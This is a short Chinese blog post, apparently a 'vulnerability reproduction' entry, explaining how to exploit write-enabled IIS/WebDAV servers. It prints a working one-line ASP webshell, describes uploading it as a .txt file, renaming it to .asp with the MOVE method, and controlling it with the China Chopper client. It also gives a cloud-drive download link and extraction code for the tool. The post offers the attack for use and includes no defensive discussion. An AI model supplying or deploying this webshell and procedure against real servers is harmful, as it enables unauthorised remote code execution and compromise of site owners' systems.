IIs服务器写入权限漏洞利用

  • A+
所属分类:漏洞复现
摘要

iis服务器配置不当产生的漏洞
IIs服务器写入权限漏洞利用

上传一句话asp木马

1
<pre class="inline:true decode:1 " >&lt;%execute request("dyan")%>

后缀改为1.txt

IIs服务器写入权限漏洞利用

通过MOVE将上传的txt文件改成可执行asp木马

IIs服务器写入权限漏洞利用

掏出中国菜刀

IIs服务器写入权限漏洞利用

工具下载地址

1
链接:<a href="https://pan.baidu.com/s/1rcHp9OWSaEZ5LSgLe93dsg ">https://pan.baidu.com/s/1rcHp9OWSaEZ5LSgLe93dsg </a><br>提取码:m9yd <br>

漏洞利用原理:https://www.2cto.com/article/201307/228165.html

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: